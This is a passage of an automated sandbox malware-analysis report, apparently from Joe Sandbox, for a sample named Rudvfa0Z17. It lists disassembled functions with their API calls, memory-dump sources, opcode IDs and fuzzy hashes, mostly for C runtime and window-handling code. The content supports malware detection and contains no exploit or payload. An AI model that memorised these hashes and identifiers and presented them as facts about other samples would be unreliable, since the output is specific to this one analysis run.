                                • Instruction Fuzzy Hash: 3D018FB2608225AB8310EF18A84485FFBE9EBC8721F004A1FF944D3310DA34C945CBEA
                                Function 026E11CF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 026E11E2
                                  • Part of subcall function 026E113D: ___BuildCatchObjectHelper.LIBCMT ref: 026E1173
                                • _UnwindNestedFrames.LIBCMT ref: 026E11F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                • String ID: csm$csm
                                • API String ID: 3487967840-3733052814
                                • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                • Instruction ID: ff00e820178f6a1560f1658756694bc1c5270754d5b6cb3d1d6455dfb3d13170
                                • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                • Instruction Fuzzy Hash: 0701E43140210ABBDF126E51CC84EEA7E6AFF19394F104058BD1E65260DB7699A2EFA4
                                Function 100111CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 100111DE
                                  • Part of subcall function 10011139: ___BuildCatchObjectHelper.LIBCMT ref: 1001116F
                                • _UnwindNestedFrames.LIBCMT ref: 100111F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                • String ID: csm$csm
                                • API String ID: 3487967840-3733052814
                                • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                • Instruction ID: 13fce880b5995998a5e615debbc516f60a37a3f13fe80d83b25b8dab8ba688de
                                • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                • Instruction Fuzzy Hash: B401FB3540110ABBDF169F51CC85EDA7F6AFF08394F004010FD5819121D776E9B1DBA0
                                Function 00416076 Relevance: 6.3, APIs: 4, Instructions: 330COMMON
                                Download Yara Rule
                                APIs
                                • __time64.LIBCMT ref: 00416076
                                  • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                  • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                • _free.LIBCMT ref: 00416558
                                • _free.LIBCMT ref: 00416576
                                • _free.LIBCMT ref: 004165CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free$Time$FileSystem__aulldiv__time64
                                • String ID:
                                • API String ID: 2144621163-0
                                • Opcode ID: ae325ad0978f90a2bcb23a69e0fe8c2e240c595b26e3e1eb508136fca242f566
                                • Instruction ID: e597b6e21c83b24130f071aa91b61d5d9bc74d6e09b869afe4f0e8ae7f2d0e3b
                                • Opcode Fuzzy Hash: ae325ad0978f90a2bcb23a69e0fe8c2e240c595b26e3e1eb508136fca242f566
                                • Instruction Fuzzy Hash: 1CF1FEB1D052688FEB64DF68C940BDEBBB2AF48304F0080EED50DA7241EB745A84CF56
                                Function 0040D410 Relevance: 6.2, APIs: 4, Instructions: 208COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memcpy_s
                                • String ID:
                                • API String ID: 2001391462-0
                                • Opcode ID: 4aae6be86b3d1d6b4d14aff822c58be8236295e128db5a4c594978f02a2d8c6c
                                • Instruction ID: 8c24046f839265f7dd94c471ccf04658c85cbb5e949e23bb84d2cde45bcb72f7
                                • Opcode Fuzzy Hash: 4aae6be86b3d1d6b4d14aff822c58be8236295e128db5a4c594978f02a2d8c6c
                                • Instruction Fuzzy Hash: 36818D75A00200EFD725DF58C884E6AF7F5FF88304F15896EE8559B391D774AA09CB90
                                Function 00414083 Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(0FC63B00), ref: 00414099
                                • __beginthread.LIBCMT ref: 004140A7
                                  • Part of subcall function 0053B74E: ShowWindow.USER32(?,00000010,?,00414550,00000005,3F7259E2,00000001,?,00000000,006810BE,000000FF,?,004133F1), ref: 0053B75F
                                • GetParent.USER32(?), ref: 004140BC
                                • ShowWindow.USER32(?,00000000,00000000), ref: 004140D2
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ShowWindow$CloseHandleParent__beginthread
                                • String ID:
                                • API String ID: 1493545653-0
                                • Opcode ID: ffa002d93298e9499bd8dd7db7d0b7f8f1a69d8d5c3601c1ed2bd556b26548dc
                                • Instruction ID: 40fa224e23b8f830ad82b08462eb6a28997bcf049a9d30b45e0b5e7cf52f7138
                                • Opcode Fuzzy Hash: ffa002d93298e9499bd8dd7db7d0b7f8f1a69d8d5c3601c1ed2bd556b26548dc
                                • Instruction Fuzzy Hash: A5517B70601A419FD344CB6CCC55B5AB7A5FF9A324F28C299E429CB3A6CB35ED05CB90
                                Function 004028B0 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                • ____mb_cur_max_func.LIBCMT ref: 00402900
                                  • Part of subcall function 00639212: __getptd.LIBCMT ref: 00639212
                                • __Wcrtomb.LIBCPMT ref: 00402920
                                  • Part of subcall function 0065E3E4: ____lc_handle_func.LIBCMT ref: 0065E3F2
                                  • Part of subcall function 0065E3E4: ____lc_codepage_func.LIBCMT ref: 0065E3FA
                                • __Wcrtomb.LIBCPMT ref: 00402942
                                • _memmove.LIBCMT ref: 00402961
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Wcrtomb$____lc_codepage_func____lc_handle_func____mb_cur_max_func__getptd_memmove
                                • String ID:
                                • API String ID: 3492520905-0
                                • Opcode ID: 8207e427de21746d45508ff11f3c515f112166457444a55717eab402c0ad729e
                                • Instruction ID: 9831e8d324916d0bc7efbe47cdbc09d3889d4b1a451e8b32cc14a188b638ffe8
                                • Opcode Fuzzy Hash: 8207e427de21746d45508ff11f3c515f112166457444a55717eab402c0ad729e
                                • Instruction Fuzzy Hash: 393130B5B0020A9FCB14DF58D9819AEB3F5FF98310F10446EE985A7381D7789D50CBA5
                                Function 00647109 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0064713D
                                • __isleadbyte_l.LIBCMT ref: 00647170
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,0063B8F1,?,00000000,00000000,?,?,?,?,0063B8F1,00000000), ref: 006471A1
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,0063B8F1,00000001,00000000,00000000,?,?,?,?,0063B8F1,00000000), ref: 0064720F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: 688babb82090d7b222c19621c08e13c2a58b9a57ca6fac4f01b99b7c2f31f7d9
                                • Instruction ID: a99febe395971e34e12f635b1b3c0d0681f2f1ecd1848f63a14cac2f5e62c5c7
                                • Opcode Fuzzy Hash: 688babb82090d7b222c19621c08e13c2a58b9a57ca6fac4f01b99b7c2f31f7d9
                                • Instruction Fuzzy Hash: 84318E31A08286EFEB20DF64CC85AAE7BBBFF01310F1845A9E4659B291D730DD41DB94
                                Function 026E4A29 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 026E4A5D
                                • __isleadbyte_l.LIBCMT ref: 026E4A90
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,026DADCF,?,00000000,00000000,?,?,?,?,026DADCF,00000000), ref: 026E4AC1
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,026DADCF,00000001,00000000,00000000,?,?,?,?,026DADCF,00000000), ref: 026E4B2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: 8c72fa43da4b4695d9512640b885080e028b736949950718b94da1c77f91feec
                                • Instruction ID: 4c517fc130961caa6549b3c1274158573028d802ed29ec4acc00717a9869005d
                                • Opcode Fuzzy Hash: 8c72fa43da4b4695d9512640b885080e028b736949950718b94da1c77f91feec
                                • Instruction Fuzzy Hash: 3D31C731A02255EFDF21DF78C884EBE3BA5FF01324F158569E4669B298DB30D940EB54
                                Function 10014A25 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10014A59
                                • __isleadbyte_l.LIBCMT ref: 10014A8C
                                • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,C4830000,?,00000000,?,?,?,100013C8,?,grams), ref: 10014ABD
                                • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,00000001,?,00000000,?,?,?,100013C8,?,grams), ref: 10014B2B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: af4ae635bc1a6c5b9520639113cb03c657ddf4de72e7d3a9bcded98ead903cf4
                                • Instruction ID: 68850b2554d5d5f992d4f98ce77fb82b49c6c0d64f95470cd521bd8ccef0272d
                                • Opcode Fuzzy Hash: af4ae635bc1a6c5b9520639113cb03c657ddf4de72e7d3a9bcded98ead903cf4
                                • Instruction Fuzzy Hash: C631D231A40286EFDB10CF64C895AAD3BF5EF01291F5B85A9F4608F0A1DB70DD80DB56
                                Function 026D1034 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 026D1054
                                • lstrlen.KERNEL32 ref: 026D10AF
                                • _memset.LIBCMT ref: 026D10E4
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 026D1103
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ByteCharInitializeMultiWide_memsetlstrlen
                                • String ID:
                                • API String ID: 4073151907-0
                                • Opcode ID: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                • Instruction ID: 9e03de0e7dfaf136cecabe02d63b3064dcab66ffad85d9090a1a26c605845042
                                • Opcode Fuzzy Hash: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                • Instruction Fuzzy Hash: FF31C4B4A4022CAFDB10DBA4CC8CEDA77B9EF59705F1045D8F519DB250DAB09A81CF60
                                Function 10001030 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 10001050
                                • lstrlen.KERNEL32 ref: 100010AB
                                • _memset.LIBCMT ref: 100010E0
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 100010FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ByteCharInitializeMultiWide_memsetlstrlen
                                • String ID:
                                • API String ID: 4073151907-0
                                • Opcode ID: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                • Instruction ID: 643029faf5a280c88e49533a5ea94790e45b7ec269e2751bbc5c19a93816d1a2
                                • Opcode Fuzzy Hash: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                • Instruction Fuzzy Hash: 603108B4A40228AFEB10DBA4CC8CEDA77B9EF59740F104598F519DB251DB709B81CF60
                                Function 0053798C Relevance: 6.1, APIs: 4, Instructions: 62windowCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00537993
                                  • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                • __CxxThrowException@8.LIBCMT ref: 005379D8
                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,0040E4B8,00000000,00000000,?,?,0070D050,00000004,0040E4B8,?), ref: 00537A02
                                • LocalFree.KERNEL32(0040E4B8,00000004,0040E4B8,?), ref: 00537A30
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                • String ID:
                                • API String ID: 1776251131-0
                                • Opcode ID: 5e0989503894a89ce33ca2c69b4bc4e8cee45f45ddce4aba07ae5d5cd333a11d
                                • Instruction ID: f4dad5bf4fd8331f79df218eef6df64bca82330d4d780d32d99e6a7cfba37b3f
                                • Opcode Fuzzy Hash: 5e0989503894a89ce33ca2c69b4bc4e8cee45f45ddce4aba07ae5d5cd333a11d
                                • Instruction Fuzzy Hash: 431186B1904309AFDB11DF54CC05FAE3BA6FF88710F208619F9559B191D7719951CB90
                                Function 0054014D Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • GetTopWindow.USER32(?), ref: 0054015D
                                • GetTopWindow.USER32(00000000), ref: 0054019C
                                • GetWindow.USER32(00000000,00000002), ref: 005401BA
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Window
                                • String ID:
                                • API String ID: 2353593579-0
                                • Opcode ID: 11b3032fbc6051c53b66df1080ab32d85e189235976543269dadaf9163f93417
                                • Instruction ID: 8fcedd5c2437ee45f2f4682e75fc443542b30d37ae301507b3d03c84d433c31c
                                • Opcode Fuzzy Hash: 11b3032fbc6051c53b66df1080ab32d85e189235976543269dadaf9163f93417
                                • Instruction Fuzzy Hash: A301E53200161ABBCF126F919C09EDF3F2ABF89354F196110FA15650A0DB36C961EBA1
                                Function 026E2265 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                • Instruction ID: 9f5ceb1f6298897f6a667c97948b1d3eb6285f7acef6428f2032c5f050e6a692
                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                • Instruction Fuzzy Hash: F511663204114EBFCF165E84CC918EE3F2BBF19254B498519FE1A59130D336C9B2BB86
                                Function 10012261 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                • Instruction ID: d628bd778cdf467a8e3ad5f5b80e9ec9ac3b556a525b6735c1659829dff4249a
                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                • Instruction Fuzzy Hash: FA1148B644018ABBCF169F84CC418EE3F62FB19394B558515FE2859131D336D9B2EB81
                                Function 00538190 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBCMT ref: 005381C2
                                • __CxxThrowException@8.LIBCMT ref: 005381A6
                                  • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,3F7259E2,006FC518,00401FC3,?,0071C220,?,3F7259E2), ref: 00641CCB
                                • __CxxThrowException@8.LIBCMT ref: 005381DE
                                • __EH_prolog3.LIBCMT ref: 005381EB
                                  • Part of subcall function 0054D6E3: LocalAlloc.KERNEL32(00000040,?,?,005381FA,00000164,00000004,000000FF,0070D1E0,?,?,?,00537A2A,00000000,?,?,0040E4B8), ref: 0054D6ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Exception@8Throw$AllocExceptionH_prolog3LocalRaise
                                • String ID:
                                • API String ID: 793778368-0
                                • Opcode ID: ca81457d4de920e0e9a4b435b2de6e2e86ac664cf2db3769abdb34d4a3b4ab93
                                • Instruction ID: cd24cc8813b73678d992765c0f20a32a7336029e90e4c99d5b6fa40ed009152a
                                • Opcode Fuzzy Hash: ca81457d4de920e0e9a4b435b2de6e2e86ac664cf2db3769abdb34d4a3b4ab93
                                • Instruction Fuzzy Hash: 82F081F090030CFBDB54FBD58C4AE9E7AEEAB85700F610168B10497141EAF46F408265
                                Function 026DBD0C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 026DBD26
                                  • Part of subcall function 026DB4CF: __FF_MSGBANNER.LIBCMT ref: 026DB4E8
                                  • Part of subcall function 026DB4CF: __NMSG_WRITE.LIBCMT ref: 026DB4EF
                                  • Part of subcall function 026DB4CF: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 026DB514
                                • std::exception::exception.LIBCMT ref: 026DBD5B
                                • std::exception::exception.LIBCMT ref: 026DBD75
                                • __CxxThrowException@8.LIBCMT ref: 026DBD86
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                • String ID:
                                • API String ID: 615853336-0
                                • Opcode ID: 7c2a2ce753ea75b9086bf07cd7115e04596d0922f47d555c69502c2f3612d0f7
                                • Instruction ID: 45bc0e9dfe6227f004d67618888ebdf2ec91476c9b306e27b9409a8bdebc3dcb
                                • Opcode Fuzzy Hash: 7c2a2ce753ea75b9086bf07cd7115e04596d0922f47d555c69502c2f3612d0f7
                                • Instruction Fuzzy Hash: E9F02275C0024EAADB14FB94CC80AEE3AAAEF40318F61055EF815EA1D4CB74CB56CB44
                                Function 00401000 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 349COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 0040133F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: VUUU$string too long
                                • API String ID: 909987262-2095466819
                                • Opcode ID: 6e096561287a09d7b5ede593103a1efb539944f00072bc765df1a0d9779e2e2b
                                • Instruction ID: d99d58f76e16cf0adc9b54881a7f57cc5e584403886d3e38afc913bc0f384d50
                                • Opcode Fuzzy Hash: 6e096561287a09d7b5ede593103a1efb539944f00072bc765df1a0d9779e2e2b
                                • Instruction Fuzzy Hash: 11D1A4313046908BDB29CF2CC55066AB7F2FF46300B544A6EE492AF7E2C779E941C799
                                Function 0041CBA0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221COMMON
                                Download Yara Rule
                                APIs
